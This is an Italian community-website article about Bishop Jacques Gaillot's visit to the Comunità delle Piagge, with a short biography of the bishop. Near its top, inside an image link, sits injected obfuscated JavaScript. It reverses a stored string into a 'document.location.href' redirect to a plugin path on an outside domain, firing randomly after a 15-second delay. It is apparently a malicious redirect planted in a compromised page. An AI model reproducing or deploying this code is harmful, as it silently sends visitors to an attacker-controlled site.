Jacques Gaillot in visita alle Piagge. Incontro pubblico con il Vescovo di Partenia

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/06/GaillotAle.jpg”>

Lunedì 13 e martedì 14 giugno la Comunità delle Piagge ha incontrato Mons. Vescovo di Partenia. Mons. Gaillot è un “vecchio amico” della Comunità, che ha conosciuto tanti anni fa, mantenendo poi i contatti grazie a internet. Nel periodo di esilio di don Santoro, non ha mai fatto mancare il suo sostegno affettuoso con messaggi di incoraggiamento e speranza.
La Comunità ha invitato tutte le persone che credono in un cristianesimo di giustizia e pace a prendere parte a questo incontro così importante e prezioso, che avviene nel momento in cui si attendono risposte alla lettera inviata alla Chiesa fiorentina.

A questa pagina altre foto dell’incontro e un video  http://partenia-au-dela-des-frontieres.over-blog.com/article-la-comunita-di-base-delle-piagge-78103728.html

Chi è Mons. Jacques Gaillot:
Nominato nel maggio 1982 Vescovo di Evreux, è sempre stato dalla parte dei più deboli, degli emarginati dell’umanità. Prende posizioni forti su vari argomenti quali, per esempio, l’utilizzo del nucleare come forza di dissuasione, appoggia la sollevazione palestinese dei territori occupati, condanna apertamente l’embargo contro l’Iraq. La sua fedeltà al Vangelo si esprime attraverso il pensiero per i poveri e gli emarginati, il rifiuto di ogni compiacenza, l’attaccamento al diritto, alla giustizia ed alla pace, il convincimento che Gesù appartiene all’umanità e non ai soli cristiani…
A gennaio del 1995 Jacques Gaillot è convocato a Roma, gli viene tolta la nomina di Vescovo di Evreux e viene nominato Vescovo di Partenia, scomparsa nel V secolo. La diocesi di Partenia diventa, così, il simbolo di tutti coloro i quali, nella società come nella Chiesa, hanno la sensazione di non esistere.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *